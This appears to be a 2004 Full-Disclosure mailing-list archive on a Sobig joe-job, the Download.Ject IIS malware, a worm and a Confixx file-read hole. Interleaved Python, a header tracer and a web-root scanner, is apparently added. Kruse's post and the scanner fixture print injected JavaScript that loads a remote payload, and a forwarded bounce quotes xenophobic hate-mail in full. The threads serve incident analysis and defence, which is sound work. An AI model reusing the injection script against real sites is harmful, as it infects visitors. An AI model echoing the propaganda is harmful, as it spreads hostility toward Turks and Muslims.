> Ankara from meeting these conditions pro forma. Even if
> they were met, the fundamental arguments against Turkish
> accession set out above would not be refuted in the
> slightest.
> A nasty game that feeds the suspicion that a conspiracy
> against Germany and Europe is being hatched here. Berlin
> has already committed itself without any mandate from the
> voters. Should accession fail, Foreign Minister Fischer
> said according to 'WamS' of 8 Feb 2004, one would 'pay a
> very high price' for it.
>
> A sentence that has to be read twice. Fischer is
> threatening the German people. What the high price would
> consist of, he does not say. Perhaps he means that the
> Turks living in Germany could take to the streets. Or he
> fears the wrath of the USA, which has been demanding
> accession for years. Washington knows very well that
> admitting Asia Minor could lead to a 'bankrupt halt' of
> the entire EU (so the 'Financial Times' of 15 Jan 2004).
> The 'International Herald Tribune' of 24 Nov 2003 judges
> quite soberly:
>
> 'That the population is shrinking across Europe means that
> even more immigration lies ahead. Admitting Turkey as an
> EU member would accelerate this trend and irrevocably
> change the definition of Europe ... Many Europeans have
> yet to accept that the traditionally white, Christian
> culture of their ancestors is being replaced by a
> multicultural mix with a strong Islamic weight.'
>
> --69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--
>
> -- End --
> ------- End of forwarded message -------
>
> ---
> Stuart Udall
> stuart atcyberdelix.dot net - http://www.cyberdelix.net/
>
> ---
> * Origin: lsi: revolution through evolution (192.168.0.2)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 23:12:46 CDT


--- Eric Paynter <ericarcticbears.com> wrote:
> On Thu, June 24, 2004 11:22 am, VX Dude said:
> > Good point, personally I wouldn't think that making a
> > small wrapper would take that long, but then again I
> > haven't done it, and I haven't done it under stress and
> > a time crunch. I code for fun and not profit, which is
> > pretty stress free.
>
> Isn't the software we're talking about open source?
> Where's the profit and time crunch? If it's a real concern, just fix it and
> submit your patch...
>
> -Eric

The profit and time crunch was in reference to
Valdis Kletnieks, who said the following words
(probably out of context; please read the thread for
full value):

"...and the build broke on OTHER systems because there wasn't a
vsnprintf() in the vendor libc - and your boss is telling you TO GET
THE THING TO BUILD, NOW....

The programmer who is willing to swear on a Bible that they have *never*
in their professional careers done something like this because they were
in a time crunch is either a newbie or a complete liar."

The word "boss" gives me the illusion of some profit
being made. Once again, I could just be paranoid.

Apparently the idea of people patching open source
products just shows what newbs we are.

-stiny

        
                

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] server administration

From: misiu_ (misiu_gmx.de)
Date: Thu Jun 24 2004 - 23:26:41 CDT


> we have some 100+ servers here, and we would like to make an inventory
> of all the servers. each server has a service tag etc... all servers
> have one or more services running on it.
>
> the idea is: we would like everything (config, static information,
> dynamic info,...) on a central server in a secure intranet.
> the first problem:
> how do you collect the data, how do you store it,what software do you
> use to get info out of a server (static info as wel as dynamic info).
> ^^^^^^ ^^^^^^^
> a script? snmp
> second problem:
> what soft can you use for pushing the config to the servers and
> restarting servers, without having to log in to each one individually
> (something like rdist?) sshkeys?
>
Hi, I'm just replying because I think there are more people who would like
to know this...

If you have a lot of servers to work on, try the "Distributed Shell": one
command on all servers at the same time.

check http://www.netfort.gr.jp/~dancer/software/dsh.html

later ll
misiu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Peter Kruse (krusekrusesecurity.dk)
Date: Fri Jun 25 2004 - 01:05:28 CDT


Hi Nick,

>It does this via the now very old ms-its: protocol zone-handling bug...
>Apparently someone needs to decode a few more levels of JavaScript, etc
>to work this all out...

I don't think so. This looks a lot like the unpatched IE bug that was also
exploited by the Ilookup trojan. See http://62.131.86.111/analysis.htm.

>> Consider to deny access to http://217.107.218.147 in your firewall. This
>> will at least prevent client PCs from getting infected.
>
>Thanks Peter, but what about all the _other_ servers out there also
>hosting more or less exactly the same files? Are you going to provide
>a list of all those IPs too?

Why should I? I think you should look at the code again, Nick.

When the javascript runs it will try to redirect you to a remote server,
http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
stored. As far as I know they do not reside on the compromised IIS servers,
which simply pull the payload from the remote host. Meanwhile the host
is no longer available.

Regards
Peter Kruse

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Jean-Marie Monnier (kedvesattglobal.net)
Date: Tue May 25 2004 - 03:45:14 CDT


I have experienced - and this annoyance still goes on - something
similar to the "stealing of identity" reported by Stuart (except that
there is so far no "hate mail" involved, but "good old spamming" to
sell junk or offer access to porn sites, which I discovered by getting
undelivered mail sent under my email address, but so far with a fake
name)... To wit:
=========================================================================================================

A message (from <kedvesattglobal.net>) (that's moi!) was received at 24 Jun 2004 20:19:46 +0000.

The following addresses had delivery problems:

<keithbattglobal.net>
        Permanent Failure: 522_mailbox_full;_group_quota_sz=3144715/3145728_ct=734/100000
        Delivery last attempted at Thu, 24 Jun 2004 20:19:46 -0000

------------------------------------------------------------------------

Reporting-MTA: dns; prserv.net
Arrival-Date: 24 Jun 2004 20:19:46 +0000

Final-Recipient: rfc822; <keithbattglobal.net>
Action: failed
Status: 5.0.0 522_mailbox_full;_group_quota_sz=3144715/3145728_ct=734/100000
Diagnostic-Code: smtp; Permanent Failure: Other undefined Status
Last-Attempt-Date: Thu, 24 Jun 2004 20:19:46 -0000

------------------------------------------------------------------------

Subject: <<POTENTIAL-SPAM>> 452332
From: "Louis Hastings" <kedvesattglobal.net>
Date: Sun, 27 Jun 2004 00:31:32 +0400
To: "Kedves" <kedvesattglobal.net>

Kedves, Looking for not expensive high-quality software?
We might have just what you need.

Windows XP Professional 2002
<http://M6AsC.mhcnjcnn.info/?wf2B2NwL1A7pOw0U0E>............. $50
<http://U3GHRW.cklibcdn.info/?N0PSPyhwOloazNNuJQhOZU>
and lots more... <http://86InS.cklibcdn.info/?mBoXU7m5nWtLEmmQYj>
======================================================================================================
I can't figure out how "they" do this, or whether I have a way to protect
myself... I am also afraid that this mail may be - and probably is - not sent
at random, but also to some people found in my address book or
elsewhere, and might paint me as a "black sheep"....

Cheers, jm

lsi wrote:

>On June 11 it was reported that Dutch mailboxes were flooded with racist
>hatemail sent via the Sobig worm.
>
>http://www.theregister.co.uk/2004/06/11/german_hate_mail_virus/
>
>I can report that not only is this activity continuing, but it is
>doing so under the names of ... well, me, at least - I have received
>several bounces indicating that my email address is being used as the
>"from" address.
>
>I include the fulltext of a sample bounce below. Note: the text is
>reportedly racist in nature. I include it for forensic purposes.
>This is the full disclosure list, right?
>
>Maybe it was just me who got joe-jobbed by Sobig in this way? Or
>maybe there are some other posters to the security conferences who
>are being toasted too?
>
>Note: 82.3.47.243 is apparently a cable connection owned by NTL UK.
>Probably just an owned box though. And probably a dynamic IP as
>well.
>
>Stuart
>
>[ok, I trimmed these headers, irrelevant]
>Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>From: MAILER-DAEMONpfmx1.pop.uk.netscalibur.com (Mail Delivery System)
>Subject: Undelivered Mail Returned to Sender
>To: stuartcyberdelix.net
>
>This is a MIME-encapsulated message.
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Notification
>Content-Type: text/plain
>
>This is the Postfix program at host pfmx1.pop.uk.netscalibur.com.
>
>I'm sorry to have to inform you that the message returned
>below could not be delivered to one or more destinations.
>
>For further assistance, please send mail to <postmaster>
>
>If you do so, please include this problem report. You can
>delete your own text from the message returned below.
>
> The Postfix program
>
><louisecyrus02.pop.uk.netscalibur.com>: host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Delivery error report
>Content-Type: message/delivery-status
>
>Reporting-MTA: dns; pfmx1.pop.uk.netscalibur.com
>Arrival-Date: Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>
>Final-Recipient: rfc822; louisecyrus02.pop.uk.netscalibur.com
>Action: failed
>Status: 5.0.0
>Diagnostic-Code: X-Postfix; host
> cyrus02.store.pop.uk.netscalibur.com[194.112.32.39] said: 552 5.2.2 Over
> quota (in reply to RCPT TO command)
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com
>Content-Description: Undelivered Message
>Content-Type: message/rfc822
>Content-Transfer-Encoding: 8bit
>
>Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
> by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5
> for <louisedircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
>Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])
> by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
> with SMTP id AVI60539;
> Thu, 24 Jun 2004 13:04:08 +0100 (BST)
>Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000
>Cc: recipient list not shown: ;
>Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
> by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000
>From: stuartcyberdelix.net
>Date: Thu, 24 Jun 2004 11:33:35 GMT
>MIME-Version: 1.0
>Subject: EU Beitritt der Tuerkei ? (Id:9951)
>Importance: Normal
>X-Priority: 3 (Normal)
>Message-ID: <4148b811e04d28.e372b.qmailcyberdelix.net>
>Content-Transfer-Encoding: 7bit
>Content-Type: text/plain; charset="us-ascii"
>
>To open accession negotiations with Turkey or not - a decision that could mean 'the end of Europe'. The phrase comes from former French President Giscard d'Estaing.
>As early as 2002 he warned that Turkey's accession to the EU would amount to the 'end of Europe'. The German advocates of accession suppress and conceal the unforeseeable consequences of this decision:
>
>(1) Turkey already has 70 million inhabitants. By the time it joins the EU it will have overtaken the FRG in population and will receive the corresponding voting weight in the EU institutions.
>(2) Economically, Turkey does not fit into the EU. The country is hopelessly over-indebted and would long since be bankrupt without constant international credit. Per-capita income is only 23% of the EU average. The EU subsidies to which Turkey would be entitled would not only blow the Brussels budget apart but also completely ruin the already over-indebted 'donor countries' such as the FRG.
>(3) By admitting an Asian country and giving up sensible external borders, the EU loses its identity.
>
>Despite these indisputable explosive charges, the campaign for Turkish accession rolls on ever faster and more unstoppably: Turkish head of government Erdogan already takes part in the conferences of the EU heads of government, admittedly still without a vote, and Turkey is already receiving EU money for 'accession preparation'.
>It is all like the introduction of the euro: first the whole plan looks unrealistic and many consider it unworkable; then open discussion of the pros and cons is criminalised as 'anti-European or xenophobic'; and finally the decision is taken behind closed doors, without the participation of the democratic sovereign and without a referendum, and declared irreversible.
>The same game with the preconditions: for the euro it was the Maastricht criteria, which were not met even before 1999 and are now openly disregarded. The Turkey criteria are: reunification of Cyprus (as if that were so important), human rights, democratisation. Nothing stops Ankara from meeting these conditions pro forma. Even if they were met, the fundamental arguments against Turkish accession set out above would not be refuted in the slightest.
>A nasty game that feeds the suspicion that a conspiracy against Germany and Europe is being hatched here. Berlin has already committed itself without any mandate from the voters. Should accession fail, Foreign Minister Fischer said according to 'WamS' of 8 Feb 2004, one would 'pay a very high price' for it.
>
>A sentence that has to be read twice. Fischer is threatening the German people. What the high price would consist of, he does not say. Perhaps he means that the Turks living in Germany could take to the streets. Or he fears the wrath of the USA, which has been demanding accession for years. Washington knows very well that admitting Asia Minor could lead to a 'bankrupt halt' of the entire EU (so the 'Financial Times' of 15 Jan 2004). The 'International Herald Tribune' of 24 Nov 2003 judges quite soberly:
>
>'That the population is shrinking across Europe means that even more immigration lies ahead. Admitting Turkey as an EU member would accelerate this trend and irrevocably change the definition of Europe ... Many Europeans have yet to accept that the traditionally white, Christian culture of their ancestors is being replaced by a multicultural mix with a strong Islamic weight.'
>
>--69D9D6749F5.1088078742/pfmx1.pop.uk.netscalibur.com--
>
>-- End --
>------- End of forwarded message -------
>
>---
>Stuart Udall
>stuart atcyberdelix.dot net - http://www.cyberdelix.net/
>
>---
> * Origin: lsi: revolution through evolution (192.168.0.2)
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: Tim (timabenath.de)
Date: Fri Jun 25 2004 - 03:05:58 CDT


Hello List,

> > Found an issue last night while testing php_exec_dir patch

Where is this patch from? I was not able to locate it with a Google search.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Call For Papers : HITB Security Conference 2004

From: Alphademon (alphademonalphademon.com)
Date: Thu Jun 24 2004 - 22:38:50 CDT


Hack In The Box Security Conference 2004 : Kuala Lumpur, Malaysia
-----------------------------------------------------------------

Greetings,

We are inviting individuals or groups who are interested in computer
security, its challenges and practices, and especially the latest
technological innovations, to send their papers to us no later than
September 1st 2004.

Topics & details are available online at :-

http://conference.hackinthebox.org/cfp.php

Thank you,

alphademon[at]hackinthebox.org
-
HackInTheBox Security Conference 2004
Kuala Lumpur, Malaysia
"Oct 04 - 07 2004"
-

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: SV: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Duncan Hill (dhill+fulldisccricalix.net)
Date: Fri Jun 25 2004 - 04:36:08 CDT


On Friday 25 June 2004 07:05, Peter Kruse might have typed:

> When the javascript runs it will try to redirect you to a remote server
> http://217.107.218.147. This is where the MSITS.EXE and the javascripts are
> stored. As far as I know they do not reside on the compromised IIS servers,
> but simply pulls of the the payload from the remote host. Meanwhile the
> host is no longer available.

I've noticed that several ISPs appear to have null-routed that IP. I can't
get past our ISP's upstream right now - trace just dies.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Paolo A. Gallenga (paolo.gallengaatlantica.it)
Date: Fri Jun 25 2004 - 04:34:47 CDT


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Grisoft's AVG 6.0.71 DAT 466 23/06/2004 also detects it as Win32/Antiqfx.

Regards, Paolo

X iniT wrote:
| Hello all,
|
|
| The attached file seems to be a variant of AntiQFX
| worm.
|
| AntiQFX Worm masquerades as
| an old dos utilitly "MSCDEX.EXE". Basically
| spreads via shared networks and delets a few
| files which belong to a couple of Photo Editting
| softwares.
| Its PE-Packed and has an anti-deletion routine.
|
| So you might be guessing whats the big deal!!
|
| Look closely and you'll see that i've attached this
| file using my yahoo account. Which happens to be
| protected by NAV !!!
|
| The following link clearly states that NAV detects
| this worm since 2002 !!!
|
http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm.html
|
| Same thing is with AVP, ClamV & F-Prot.
|
| Only Sophos detects this file as AntiQFX.F variant.
|
| So keep an eye friends, this incident has really
| made me have second thoughts about antivirus softwares
| and their reliability.
|
|
| Regards,
| X!
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)

iD8DBQFA2/G2wreiUCR0oIoRApeDAKCttD8rFOsDhBviLahAEqhycmXR5wCgo+pD
mFTUPjPHzZcnaO/5zfJss+A=
=eAmZ
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: X iniT (x1n1tyahoo.com)
Date: Fri Jun 25 2004 - 02:36:07 CDT


Hello all,

The attached file seems to be a variant of the AntiQFX
worm.

The AntiQFX worm masquerades as
an old DOS utility "MSCDEX.EXE". Basically it
spreads via shared networks and deletes a few
files which belong to a couple of photo editing
programs.
It's PE-packed and has an anti-deletion routine.

So you might be guessing, what's the big deal!!

Look closely and you'll see that I've attached this
file using my Yahoo account, which happens to be
protected by NAV !!!

The following link clearly states that NAV has detected
this worm since 2002 !!!
http://securityresponse.symantec.com/avcenter/venc/data/w32.antiqfx.f.worm.html

Same thing with AVP, ClamV & F-Prot.

Only Sophos detects this file as an AntiQFX.F variant.

So keep an eye out, friends; this incident has really
made me have second thoughts about antivirus software
and its reliability.

Regards,
X!

                

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



 
Re: [Full-Disclosure] VX: Old worm in new shoes (AntiQFX)

From: Duncan Hill (dhill+fulldisccricalix.net)
Date: Fri Jun 25 2004 - 05:56:29 CDT


On Friday 25 June 2004 08:36, X iniT might have typed:

> The AntiQFX worm masquerades as
> an old DOS utility "MSCDEX.EXE". Basically it
> spreads via shared networks and deletes a few
> files which belong to a couple of photo editing

F-Secure Anti-Virus for Linux version 4.52 build 2461
Copyright (c) 1999-2003 F-Secure Corporation. All Rights Reserved.

Database version: 2004-06-25_01

Scan started at Fri Jun 25 11:55:26 2004

MSCDEX.EXE: Infected: Win32.HLLW.AntiQFX.a [AVP]
MSCDEX.EXE: Infected: Win32.HLLW.AntiQFX.a [AVP]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
[Full-Disclosure] Security hole in Confixx backup script

From: Dirk Pirschel (dirkpirschel.de)
Date: Fri Jun 25 2004 - 08:08:34 CDT


Hi,

I found a security hole in Confixx. A malicious backup request via the
webinterface might be used by any user to read files located in /root
(which is the default installation directory of confixx).

The most interesting files you can retrieve with this attack are:
  /root/confixx/safe/shadow.tmp
  /root/confixx/safe/shadow_header
These files are used to build /etc/shadow, i.e. they contain all
(encrypted) passwords used on this host.

SWSoft was informed yesterday at 22:30 (CET).

If you are using confixx, you should disable the backup script.

-Dirk

--
Linux - The choice of a GNU generation

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFA3CPSxJ5Dfiog8/YRAn3zAJwLwFHsaNu550zImBv6rJdmooL6uwCgiY4Y
R0rGYwd0R6SL6ZGWnDQUpk4=
=oG1O
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: Gary Flynn (flynngnjmu.edu)
Date: Fri Jun 25 2004 - 08:20:34 CDT


Just a reminder. This isn't the first time this has
happened:

http://www.computerworld.com/securitytopics/security/story/0,10801,84675,00.html?SKC=home84675

--
Gary Flynn
Security Engineer
James Madison University

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
Re: [Full-Disclosure] defamatory joe job attack by botnet

From: Charles Richmond (cmriisc.com)
Date: Fri Jun 25 2004 - 08:24:16 CDT


On Jun 24, 2004, at 11:43 PM, lsi wrote:

> I can report that not only is this activity continuing, but it is
> doing so under the names of ... well, me, at least - I have received
> several bounces indicating that my email address is being used as the
> "from" address.

The spammers are using addresses from bugtraq submissions
and other security lists also. Clearly it is to their advantage to
harass those of us who are at all active on the security and
anti-spam side. It took Verizon months to stop blocking based
on spoofed addresses and Barry Shein's "Software Tool & Die"
(std.com) is still blocking based on spoofed addresses.

It behooves all of us to do our best to block actual spammers
and not their spoofed victims.

                                                   Charles Richmond

       Implemented Integrated Systems Corporation http://www.iisc.com
     O/S, I18N, Systems Development, Process and Integration Providers
     cmriisc.com cmracm.org YIM:cmriisc http://www.iisc.com/cmr
            7B West St., Somerville, Ma. USA 02144 (781) 389 9777

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
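Stuart's and Jean-Marie's bounces above, and Charles' point that blocking should hit the spammer rather than the spoofed From: address, all turn on the same piece of forensics: From: is whatever the sender typed, while the Received: chain, read from the top down to the first hop that arrived from outside the receiving operator's own relays, records the address that actually injected the message. The following is an added example, not code from any of the posters, that does that walk in Python over the header block of Stuart's bounce (copied from the thread; the "@" signs the archive stripped are restored and the body is omitted). Which relays count as trusted is an assumption made explicit in `TRUSTED_RELAYS`; on a real MX you would fill it from your own MTA inventory.

```python
import re
from email import message_from_string
from typing import Optional

# Constructed sample input: the header block of the undelivered message that
# Stuart Udall's bounce returned to him, copied from the thread above. The
# archive stripped the "@" signs; they are restored here. Body omitted.
# On-the-wire order: the newest Received: line comes first.
BOUNCED_HEADERS = """\
Received: from rmx5.dircon.net (rmx5.dircon.net [195.157.4.7])
 by pfmx1.pop.uk.netscalibur.com (Postfix) with ESMTP id 69D9D6749F5
 for <louise@dircon.co.uk>; Thu, 24 Jun 2004 13:05:42 +0100 (BST)
Received: from qmx0.uk.netscalibur.com (qmx0.uk.netscalibur.com [194.112.32.44])
 by rmx5.dircon.net (Mirapoint Messaging Server MOS 3.3.5-GR)
 with SMTP id AVI60539;
 Thu, 24 Jun 2004 13:04:08 +0100 (BST)
Received: (qmail 95729 invoked from network); 24 Jun 2004 12:04:33 -0000
Cc: recipient list not shown: ;
Received: from unknown (HELO yddcfxtx.net) (82.3.47.243)
 by 194.112.32.44 with SMTP id 1088078670X93760X0; 24 Jun 2004 12:04:30 -0000
From: stuart@cyberdelix.net
Date: Thu, 24 Jun 2004 11:33:35 GMT
Subject: EU Beitritt der Tuerkei ? (Id:9951)
Message-ID: <4148b811e04d28.e372b.qmail@cyberdelix.net>

"""

# Assumption: the MTAs the receiving operator runs itself. A Received: line
# written by one of these is believed; anything below the first hop that came
# from outside them may have been forged by whoever injected the message.
TRUSTED_RELAYS = {"195.157.4.7", "194.112.32.44"}

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"


def parse_received(value: str) -> Optional[dict]:
    """Split one Received: header into helo / ip / by. Returns None for a
    header with no remote client (qmail's "invoked from network" hand-off).
    The HELO name is whatever the client claimed; only the bracketed IP was
    observed by the receiving MTA itself."""
    flat = " ".join(value.split())                      # unfold continuation lines
    m_from = re.match(r"from\s+(\S+)", flat)
    if not m_from:
        return None
    helo = m_from.group(1)
    m_helo = re.search(r"\(HELO\s+([^)\s]+)\)", flat)    # qmail writes HELO separately
    if m_helo:
        helo = m_helo.group(1)
    m_ip = re.search(r"[\[(](" + IPV4 + r")[\])]", flat)  # "[1.2.3.4]" or "(1.2.3.4)"
    m_by = re.search(r"\bby\s+(\S+)", flat)
    return {
        "helo": helo,
        "ip": m_ip.group(1) if m_ip else None,
        "by": m_by.group(1) if m_by else None,
    }


def injection_point(raw_headers: str, trusted_relays: set) -> Optional[dict]:
    """Walk Received: headers newest-first; return the first hop whose client
    address is not one of our own relays, i.e. the host that handed the
    message to us. Everything below it is the sender's word."""
    msg = message_from_string(raw_headers)
    for value in msg.get_all("Received", []):
        hop = parse_received(value)
        if hop is None or hop["ip"] is None:
            continue                                    # internal hand-off
        if hop["ip"] in trusted_relays:
            continue                                    # relay-to-relay, still inside
        return hop
    return None


def triage(raw_headers: str, trusted_relays: set = TRUSTED_RELAYS) -> dict:
    """Separate evidence (the injecting IP) from claims (From:, HELO), so a
    block or abuse report lands on the spammer and not the joe-job victim."""
    msg = message_from_string(raw_headers)
    hop = injection_point(raw_headers, trusted_relays)
    claimed = msg.get("From", "").strip()
    claimed_domain = claimed.rsplit("@", 1)[-1].strip("<> ").lower()
    helo = (hop or {}).get("helo") or ""
    return {
        "claimed_sender": claimed,
        "injecting_ip": hop["ip"] if hop else None,
        "helo_name": helo or None,
        "received_by": hop["by"] if hop else None,
        # True only if the injecting host at least claimed the From: domain;
        # here it did not, so the From: domain is a victim, not a source.
        "from_domain_corroborated": bool(hop and claimed_domain)
        and helo.lower().endswith(claimed_domain),
    }


if __name__ == "__main__":
    for key, val in triage(BOUNCED_HEADERS).items():
        print(f"{key:25} {val}")
```

On the sample this stops at the qmail hop: 82.3.47.243, announcing itself as yddcfxtx.net, is the address that handed the message to 194.112.32.44, and it has nothing to do with cyberdelix.net. That IP (or its netblock, for a dynamic cable range) is what an abuse report or a temporary block should name; a filter keyed on the From: address would silence Stuart and leave the sender untouched.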


 
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: joe (mvpjoeware.net)
Date: Fri Jun 25 2004 - 08:47:37 CDT


For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx
 

Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.

Important: Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients

Hi all,

This is a heads up.

New malware has been reported from several sources, so it appears to be
fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers were compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (e.g. .html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">

    function InjectedDuringRedirection(){
      showModalDialog('md.htm', window, "dialog
Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
:1\;").location= " java script:'<SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the
following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
trojan-downloader and run it.

Consider denying access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS:
http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
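Peter's description gives a server-side scanner enough to work with: the injected JavaScript is appended to files in the IIS web folder, including types that should never carry script (.txt, .gif), and it pulls its payload from a bare IP address through showModalDialog() and a space-obfuscated javascript: URL. The following is an added example, not code from Peter, joe or Microsoft: a Python walk over a web root that flags files on those four heuristics, so an administrator can find every modified file rather than only the pages someone noticed. The small web root it builds for demonstration is constructed here and points at the TEST-NET address 192.0.2.10 instead of the real host; it is not taken from an infected server.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# File types that may legitimately carry <script>. A script tag anywhere else
# (the thread reports .txt and .gif being modified) is suspect on its own.
SCRIPT_BEARING = {".html", ".htm", ".asp", ".aspx", ".shtml", ".js"}

SCRIPT_TAG = re.compile(rb"<\s*script\b", re.I)
HTML_END = re.compile(rb"</\s*html\s*>", re.I)
# The quoted sample fetches its payload from http://217.107.218.147/ by bare
# IP; the pattern tolerates the spaces Peter had to insert to get past filters.
RAW_IP_URL = re.compile(rb"https?\s*:\s*/\s*/\s*\d{1,3}(?:\.\d{1,3}){3}", re.I)
MODAL_DIALOG = re.compile(rb"showModalDialog", re.I)
JS_URL = re.compile(rb"java\s*script\s*:", re.I)      # "java script:" in the sample


def findings_for(name: str, data: bytes) -> List[str]:
    """Heuristics for one file. Each hit is a reason string; an empty list
    means nothing matched. These are indicators, not proof of compromise."""
    reasons = []
    ext = Path(name).suffix.lower()
    if SCRIPT_TAG.search(data):
        if ext not in SCRIPT_BEARING:
            reasons.append(f"<script> inside a {ext or 'extensionless'} file")
        end = HTML_END.search(data)
        if end and SCRIPT_TAG.search(data, end.end()):
            reasons.append("<script> appended after </html>")
    if RAW_IP_URL.search(data):
        reasons.append("URL to a bare IP address")
    if MODAL_DIALOG.search(data):
        reasons.append("showModalDialog() call")
    if JS_URL.search(data):
        reasons.append("javascript: URL (possibly space-obfuscated)")
    return reasons


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Walk a web root and report every file with at least one finding,
    keyed by its path relative to the root."""
    report = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        reasons = findings_for(path.name, path.read_bytes())
        if reasons:
            report[path.relative_to(root).as_posix()] = reasons
    return report


# Constructed fixture. The injected tail mirrors the shape of the code Peter
# quoted but points at the TEST-NET address 192.0.2.10, not the real host.
INJECTED_TAIL = (
    b'\r\n<script language="Javascript">\r\n'
    b'function InjectedDuringRedirection(){\r\n'
    b'  showModalDialog("md.htm", window, "dialogTop:-10000;dialogHeight:1;dialogWidth:1")'
    b'.location="java script:\'<SCRIPT SRC=http://192.0.2.10/shellxxx.js></script>\'";\r\n'
    b'}\r\nInjectedDuringRedirection();\r\n</script>\r\n'
)


def build_sample_webroot(root: Path) -> None:
    """Two clean files and three carrying the appended script."""
    (root / "img").mkdir(parents=True, exist_ok=True)
    clean = b"<html><head><title>Home</title></head><body>Welcome</body></html>\r\n"
    (root / "index.html").write_bytes(clean)
    (root / "readme.txt").write_bytes(b"Release notes. See http://www.example.test/\r\n")
    (root / "page.html").write_bytes(clean + INJECTED_TAIL)      # script after </html>
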